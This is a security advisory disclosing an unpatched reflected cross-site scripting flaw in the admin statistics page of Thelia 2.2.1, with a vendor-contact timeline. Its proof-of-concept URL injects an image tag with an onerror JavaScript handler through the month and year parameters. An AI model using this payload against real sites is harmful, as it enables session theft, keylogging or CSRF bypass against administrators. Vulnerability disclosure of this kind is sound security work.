Thelia 2.2.1: XSS
Date: 2015-11-13 11:35:381. Introduction
| Affected Product: | Thelia 2.2.1 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Contact: | info@thelia.net |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/29/2015 |
| Disclosed to public: | 11/13/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of Curesec GmbH |
2. Overview
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example possible to inject JavaScript keyloggers, or to bypass CSRF protection.
3. Proof of Concept
http://localhost/thelia_2.1.5/web/admin/home/stats?month=95<img src=no onerror=alert(1)>&year=20155<img src=no onerror=alert(2)>
4. Solution
This issue has not been fixed by the vendor
5. Report Timeline
| 09/29/2015 | Informed Vendor about Issue (no reply) |
| 10/21/2015 | Reminded Vendor of Disclosure Date (no reply) |
| 11/13/2015 | Disclosed to public |